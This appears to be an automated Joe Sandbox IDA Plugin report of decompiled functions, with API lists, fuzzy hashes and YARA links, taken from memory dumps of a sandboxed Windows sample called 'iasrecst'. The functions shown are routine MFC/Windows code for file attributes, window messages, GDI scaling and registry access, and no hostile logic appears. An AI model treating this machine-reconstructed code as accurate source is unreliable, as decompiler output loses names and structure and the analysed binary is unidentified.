Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MetricsSystem$RectWindow$InvertLongOffsetRelease
String ID:
API String ID: 2500086165-0
Opcode ID: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
Instruction ID: 7c5e0aa81d449cf31b82ccaaec63d8c78fb3c057318de3585a12a8b43351a0d8
Opcode Fuzzy Hash: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
Instruction Fuzzy Hash: 4A112B72E00218ABCB10DFF9ED4999EBFB8EF44350F104166EA05E3250D775AD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00418C88, Relevance: 10.6, APIs: 7, Instructions: 148
timeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00418C88(void* __ecx) {
				void* __esi;
				void* _t60;
				CHAR* _t83;
				void* _t95;
				struct _SECURITY_DESCRIPTOR* _t101;
				signed int _t102;
				void* _t120;
				CHAR** _t124;
				void* _t126;

				E00406520(E00429FC8, _t126);
				_t120 = __ecx;
				_t124 = __ecx + 0x10;
				E00416A77(_t124, _t124);
				if(( *(_t126 + 0xd) & 0x00000010) != 0 && E004182CC( *(_t126 + 8), _t126 - 0x150) != 0) {
					_t83 =  *0x436980; // 0x436994
					 *(_t126 - 0x10) = _t83;
					_t102 = 0;
					_push(_t126 - 0x10);
					 *(_t126 - 4) = 0;
					E00417BF9(_t126,  *(_t126 + 8));
					if(GetDiskFreeSpaceA( *(_t126 - 0x10), _t126 - 0x24, _t126 - 0x20, _t126 - 0x1c, _t126 - 0x28) != 0) {
						_t102 =  *(_t126 - 0x24) *  *(_t126 - 0x20) *  *(_t126 - 0x1c);
					}
					_t91 =  *((intOrPtr*)(_t126 - 0x144));
					_t136 = _t102 -  *((intOrPtr*)(_t126 - 0x144)) + _t91;
					if(_t102 >  *((intOrPtr*)(_t126 - 0x144)) + _t91) {
						_push(1);
						_push( *(_t126 + 8));
						_push(_t126 - 0x14);
						_t95 = E00418BE2(_t136);
						 *(_t126 - 4) = 1;
						E00416B95(_t124, _t126, _t95);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						E00416AEC(_t126 - 0x14);
					}
					 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
					E00416AEC(_t126 - 0x10);
				}
				_t58 =  *_t124;
				if( *((intOrPtr*)( *_t124 - 8)) == 0 || E004177BD(_t120, _t58,  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10))) == 0) {
					E00416A77(_t124, _t124);
					_t60 = E004177BD(_t120,  *(_t126 + 8),  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10)));
				} else {
					E00416BE5(_t120 + 0xc,  *(_t126 + 8));
					if(GetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38) != 0) {
						E0041837E(_t126 - 0x150, _t126 - 0x18);
						SetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38);
					}
					 *(_t126 + 0xc) = 0;
					if(GetFileSecurityA( *(_t126 + 8), 4, 0, 0, _t126 + 0xc) != 0) {
						_t101 = E004131DD( *(_t126 + 0xc));
						if(GetFileSecurityA( *(_t126 + 8), 4, _t101,  *(_t126 + 0xc), _t126 + 0xc) != 0) {
							SetFileSecurityA( *_t124, 4, _t101);
						}
						E00413206(_t101);
					}
					_t60 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
				return _t60;
			}

APIs

__EH_prolog.LIBCMT ref: 00418C8D
GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?,?,?), ref: 00418CF4
GetFileTime.KERNEL32(?,?,?,?,?), ref: 00418D87
SetFileTime.KERNEL32(?,?,?,?), ref: 00418DB2
GetFileSecurityA.ADVAPI32(?,00000004,00000000,00000000,?), ref: 00418DCC
GetFileSecurityA.ADVAPI32(?,00000004,00000000,?,?), ref: 00418DEA
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00418DF5

Part of subcall function 00417BF9: lstrcpynA.KERNEL32(00000000,?,00000104,?,?), ref: 00417C20

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: File$Security$Time$DiskFreeH_prologSpacelstrcpyn
String ID:
API String ID: 726943650-0
Opcode ID: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
Instruction ID: be22718d3dfdaed04fc9161a777cdf82254a032ef9ddc828293ac01cd1254a92
Opcode Fuzzy Hash: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
Instruction Fuzzy Hash: DD513BB2600209AFDF11EFA1DC85EEEBB7CFF04354F00802AF915A6191DB35DA958B64

Uniqueness

Uniqueness Score: -1.00%

Function 00415F1B, Relevance: 10.6, APIs: 7, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00415F1B(intOrPtr* __ecx) {
				struct HWND__* _t45;
				intOrPtr* _t54;
				int _t63;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr* _t78;
				struct tagMSG* _t80;
				void* _t81;

				_t67 = 1;
				_t78 = __ecx;
				 *((intOrPtr*)(_t81 + 0x18)) = _t67;
				 *(_t81 + 0x14) = 0;
				if(( *(_t81 + 0x28) & 0x00000004) == 0) {
					L2:
					 *((intOrPtr*)(_t81 + 0x10)) = 0;
					L3:
					_t45 = GetParent( *(_t78 + 0x1c));
					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x00000018;
					 *(_t81 + 0x1c) = _t45;
					_t80 = E004126FB() + 0x30;
					L4:
					while( *((intOrPtr*)(_t81 + 0x18)) == 0 || PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
						while( *((intOrPtr*)( *((intOrPtr*)(E004126FB())) + 0x5c))() != 0) {
							if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
								_t63 = _t80->message;
								if(_t63 == 0x118 || _t63 == 0x104) {
									E0041668C(_t78, 1);
									UpdateWindow( *(_t78 + 0x1c));
									 *((intOrPtr*)(_t81 + 0x10)) = 0;
								}
							}
							if( *((intOrPtr*)( *_t78 + 0x70))() == 0) {
								 *(_t78 + 0x24) =  *(_t78 + 0x24) & 0xffffffe7;
								return  *((intOrPtr*)(_t78 + 0x2c));
							} else {
								_t54 = E004126FB();
								_push(_t80);
								if( *((intOrPtr*)( *_t54 + 0x64))() != 0) {
									 *((intOrPtr*)(_t81 + 0x18)) = 1;
									 *(_t81 + 0x14) = 0;
								}
								if(PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L4;
								}
							}
						}
						return E00429977(0) | 0xffffffff;
					}
					if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
						E0041668C(_t78, 1);
						UpdateWindow( *(_t78 + 0x1c));
						 *((intOrPtr*)(_t81 + 0x10)) = 0;
					}
					if(( *(_t81 + 0x24) & 0x00000001) == 0 &&  *(_t81 + 0x1c) != 0 &&  *(_t81 + 0x14) == 0) {
						SendMessageA( *(_t81 + 0x28), 0x121, 0,  *(_t78 + 0x1c));
					}
					if(( *(_t81 + 0x24) & 0x00000002) != 0) {
						L14:
						 *((intOrPtr*)(_t81 + 0x18)) = 0;
						goto L4;
					} else {
						 *(_t81 + 0x14) =  *(_t81 + 0x14) + 1;
						if(SendMessageA( *(_t78 + 0x1c), 0x36a, 0,  *(_t81 + 0x14)) != 0) {
							goto L4;
						}
						goto L14;
					}
				}
				_t66 = E00416528(__ecx);
				 *((intOrPtr*)(_t81 + 0x10)) = _t67;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}

APIs

GetParent.USER32(?), ref: 00415F4F
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00415F78
UpdateWindow.USER32(?), ref: 00415F94
SendMessageA.USER32 ref: 00415FBA
SendMessageA.USER32 ref: 00415FD9
UpdateWindow.USER32(?), ref: 0041601C
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0041604F

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
Instruction ID: a9d405acd130b45d961834bac1476ad35e2ab5294cb8f6c1009cd3559e17cf10
Opcode Fuzzy Hash: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
Instruction Fuzzy Hash: 49418030604B41DBD720DF26C844E9BBFE4FFC5B54F140A1EF48186291D779D986CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 004296EA, Relevance: 10.6, APIs: 7, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004296EA(void* __ebx, int __ecx, void* __edi, intOrPtr _a4) {
				struct HDC__* _t26;
				struct tagSIZE* _t39;
				int _t43;
				long _t45;
				struct tagSIZE* _t48;
				int _t51;

				_t41 = __ecx;
				_t51 = __ecx;
				if(_a4 != 0) {
					_t39 = __ecx + 0x38;
					GetViewportExtEx( *(__ecx + 8), _t39);
					_t48 = __ecx + 0x30;
					GetWindowExtEx( *(__ecx + 8), _t48);
					if(_t48->cx > 0xffffc000) {
						while(1) {
							_t41 = _t48->cx;
							if(_t41 >= 0x4000) {
								goto L6;
							}
							_t45 = _t39->cx;
							if(_t45 > 0xffffc000 && _t45 < 0x4000) {
								_t41 = _t41 + _t41;
								_t48->cx = _t41;
								_t39->cx = _t45 + _t45;
								if(_t41 > 0xffffc000) {
									continue;
								}
							}
							goto L6;
						}
					}
					L6:
					if( *(_t51 + 0x34) > 0xffffc000) {
						while(1) {
							_t41 =  *(_t51 + 0x34);
							if(_t41 >= 0x4000) {
								goto L11;
							}
							_t43 =  *(_t51 + 0x3c);
							if(_t43 > 0xffffc000 && _t43 < 0x4000) {
								_t41 = _t41 + _t41;
								 *(_t51 + 0x34) = _t41;
								 *(_t51 + 0x3c) = _t43 + _t43;
								if(_t41 > 0xffffc000) {
									continue;
								}
							}
							goto L11;
						}
					}
					L11:
					_t39->cx = E00428907(_t41, _t39->cx,  *((intOrPtr*)(_t51 + 0x10)),  *0x439bf8,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x58));
					 *(_t51 + 0x3c) = E00428907(_t41,  *(_t51 + 0x3c),  *((intOrPtr*)(_t51 + 0x10)),  *0x439bfc,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x5a));
				}
				_t26 =  *(_t51 + 4);
				if(_t26 != 0) {
					SetMapMode(_t26, 8);
					SetWindowExtEx( *(_t51 + 4),  *(_t51 + 0x30),  *(_t51 + 0x34), 0);
					SetViewportExtEx( *(_t51 + 4),  *(_t51 + 0x38),  *(_t51 + 0x3c), 0);
					return E004297EF(_t51);
				}
				return _t26;
			}

APIs

GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
GetDeviceCaps.GDI32(?,00000058), ref: 00429779
GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
SetMapMode.GDI32(00000000,00000008), ref: 004297BC
SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode
String ID:
API String ID: 396987064-0
Opcode ID: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
Instruction ID: 029ae3144c04a12eb84a26ff9b3d66945ac525f496733399c5de6a1960b9f250
Opcode Fuzzy Hash: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
Instruction Fuzzy Hash: F2312871200A11EFDB715F25EE80B2BBBB6FF94700B90982DE28691A60D775A8519B08

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF70, Relevance: 10.6, APIs: 7, Instructions: 74windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
GetMessageA.USER32 ref: 0041FF9B
DispatchMessageA.USER32 ref: 0041FFAE
SetRectEmpty.USER32(?), ref: 0041FFD7
GetDesktopWindow.USER32 ref: 0041FFEF
LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
String ID:
API String ID: 1192691108-0
Opcode ID: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
Instruction ID: 7b4feb9468581440af327a22176e3db1bbe8d75c7627dd3e4d63dbf17c191cc2
Opcode Fuzzy Hash: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
Instruction Fuzzy Hash: 6B2162B1600709AFD7209F65EC84E67BBECFB08384B44483EF545C6151D735F8469B64

Uniqueness

Uniqueness Score: -1.00%

Function 004152C7, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004152C7(struct HDWP__** _a4, struct HWND__* _a8, RECT* _a12) {
				struct tagRECT _v20;
				int _t15;
				int _t23;
				struct HDWP__* _t25;
				struct HWND__* _t26;
				int _t27;
				long _t28;
				struct HDWP__** _t35;
				RECT* _t37;

				_t26 = _a8;
				_t15 = GetParent(_t26);
				_t35 = _a4;
				_a8 = _t15;
				if(_t35 == 0 ||  *_t35 != 0) {
					GetWindowRect(_t26,  &_v20);
					ScreenToClient(_a8,  &_v20);
					ScreenToClient(_a8,  &(_v20.right));
					_t37 = _a12;
					_t15 = EqualRect( &_v20, _t37);
					if(_t15 == 0) {
						_t23 = _t37->top;
						_t27 = _t37->left;
						_t28 = _t37->bottom;
						_push(0x14);
						if(_t35 == 0) {
							return SetWindowPos(_t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						}
						_t25 = DeferWindowPos( *_t35, _t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						 *_t35 = _t25;
						return _t25;
					}
				}
				return _t15;
			}

APIs

GetParent.USER32(?), ref: 004152D4
GetWindowRect.USER32 ref: 004152EE
ScreenToClient.USER32 ref: 00415301
ScreenToClient.USER32 ref: 0041530A
EqualRect.USER32 ref: 00415314
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0041533C
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,00000000,00000000,?), ref: 00415354

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 6a085f23455b506641fb664c9f872d6e0eb60696c2830eab613455ce1ebaad90
Instruction ID: 07014e229ed6a7b25482b6998f11fd7e237ae46f5a3226271598de642c651d74
Opcode Fuzzy Hash: 6a085f23455b506641fb664c9f872d6e0eb60696c2830eab613455ce1ebaad90
Instruction Fuzzy Hash: FB117F76600609FFE7109F68CC88EBBBBBDEB88710F108529B91593215E774AD418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00425DE9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425DE9(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x7c), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x90), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x00425dff
0x00425e0b
0x00425e0e
0x00425e11
0x00425e14
0x00425e1f
0x00425e59
0x00425e59
0x00425e64
0x00425e69
0x00425e69
0x00425e6e
0x00425e73
0x00425e73
0x00425e7c

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00425E17
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E3A
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E59
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E69
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E73

Strings

software, xrefs: 00425E01

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: ef35ffc1de14d179d2ad0911c310037a7393524ecf252a7ab65d51927ebb2645
Instruction ID: 0af0f3997741b28716963c04c81515c15655377052ffcc376828dcfe476aa2da
Opcode Fuzzy Hash: ef35ffc1de14d179d2ad0911c310037a7393524ecf252a7ab65d51927ebb2645
Instruction Fuzzy Hash: 0311F872A00528FBCB21CB96DC84DEFFFBCEF89744F5000AAA515A2121D3705A01DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404F6B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00404F6B(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t18;
				intOrPtr* _t22;
				intOrPtr _t30;

				if(E00404DD2() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						return 0;
					}
					_t22 = _a8;
					if(_t22 == 0 ||  *_t22 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t22 + 4)) = 0;
						 *((intOrPtr*)(_t22 + 8)) = 0;
						 *((intOrPtr*)(_t22 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t30 = 1;
						 *(_t22 + 0x10) = _t18;
						 *((intOrPtr*)(_t22 + 0x24)) = _t30;
						if( *_t22 >= 0x48) {
							lstrcpyA(_t22 + 0x28, "DISPLAY");
						}
						return _t30;
					}
				}
				return  *0x439618(_a4, _a8);
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00404FA9
GetSystemMetrics.USER32 ref: 00404FC1
GetSystemMetrics.USER32 ref: 00404FC8
lstrcpyA.KERNEL32(?,DISPLAY), ref: 00404FEC

Strings

DISPLAY, xrefs: 00404FE6
B, xrefs: 00404F8A

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: System$Metrics$InfoParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1409579217-3316187204
Opcode ID: fc4978af5ac8f74fb81d04261746e33f8207f39954ecdab6ad15e40bdb5edc53
Instruction ID: 0269e9ff9c82b1da89f60d18f206ef68f762114564e5db41c1733f16ce370355
Opcode Fuzzy Hash: fc4978af5ac8f74fb81d04261746e33f8207f39954ecdab6ad15e40bdb5edc53
Instruction Fuzzy Hash: 0411C6B1600326ABDB119F649C8469BBFA8EF45750B508073FE05AE182D7B9D941CBF8

Uniqueness

Uniqueness Score: -1.00%

Function 0040381D, Relevance: 10.6, APIs: 7, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040381D(intOrPtr _a4) {
				long _v8;
				long _v12;
				struct tagMSG _v40;

				if(_a4 != 0) {
					_v8 = GetTickCount();
					while(1 != 0) {
						_v12 = GetTickCount();
						if(_v12 < _v8 || _v12 - _v8 > _a4) {
							break;
						} else {
							if(PeekMessageA( &_v40, 0, 0, 0, 0) == 0) {
								Sleep(1);
							} else {
								GetMessageA( &_v40, 0, 0, 0);
								TranslateMessage( &_v40);
								DispatchMessageA( &_v40);
							}
							continue;
						}
					}
					return 1;
				}
				return 1;
			}

APIs

GetTickCount.KERNEL32 ref: 0040382D
GetTickCount.KERNEL32 ref: 0040383F

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 62664b2ccced0f01c7f848e18cfdb5bd16bdfa6a3194e22d98a032b2161cbf00
Instruction ID: 9bbdf3f7d950dda3c106a7053e01199b699c7596eca1dee1c5b4b451079f442e
Opcode Fuzzy Hash: 62664b2ccced0f01c7f848e18cfdb5bd16bdfa6a3194e22d98a032b2161cbf00
Instruction Fuzzy Hash: 6D11F431A00208EBEB10EFA0D949B9D7BF8AB04705F6081A5F905B61C0D775AB469B99

Uniqueness

Uniqueness Score: -1.00%

Function 00417178, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417178(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x00417180
0x00417188
0x0041718f
0x00417196
0x0041719d
0x004171aa
0x004171b1
0x004171b4
0x004171b6
0x004171bb

APIs

GetSysColor.USER32(0000000F), ref: 00417184
GetSysColor.USER32(00000010), ref: 0041718B
GetSysColor.USER32(00000014), ref: 00417192
GetSysColor.USER32(00000012), ref: 00417199
GetSysColor.USER32(00000006), ref: 004171A0
GetSysColorBrush.USER32(0000000F), ref: 004171AD
GetSysColorBrush.USER32(00000006), ref: 004171B4

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 80a27b1f02e3c58edf4c19fbc6f0daf7df48ddc1e8fb47ec45f2cb1cd70874ec
Instruction ID: 88891574432b8891f472ad4648ce297f27c70735abb480ab9afea6e1339babde
Opcode Fuzzy Hash: 80a27b1f02e3c58edf4c19fbc6f0daf7df48ddc1e8fb47ec45f2cb1cd70874ec
Instruction Fuzzy Hash: 3AF01C71A407489BD730BF729D49B47BBE0FFC4B10F42092EE2858BA91E6B5A401DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0042047F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042047F() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L6:
						 *0x439628 =  *0x439628 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L6;
					}
					goto L5;
				} else {
					L5:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x439628 = _t6;
					return _t6;
				}
			}

0x00420495
0x0042049f
0x004204a3
0x004204bf
0x004204bf
0x00000000
0x004204bf
0x004204a5
0x004204ab
0x00000000
0x00000000
0x00000000
0x004204ad
0x004204ad
0x004204b2
0x004204b8
0x00000000
0x004204b8

APIs

GetVersion.KERNEL32 ref: 0042048C
GetVersion.KERNEL32 ref: 00420497
GetVersion.KERNEL32 ref: 0042049F
GetVersion.KERNEL32 ref: 004204A5
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 004204B2

Strings

MSWHEEL_ROLLMSG, xrefs: 004204AD

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
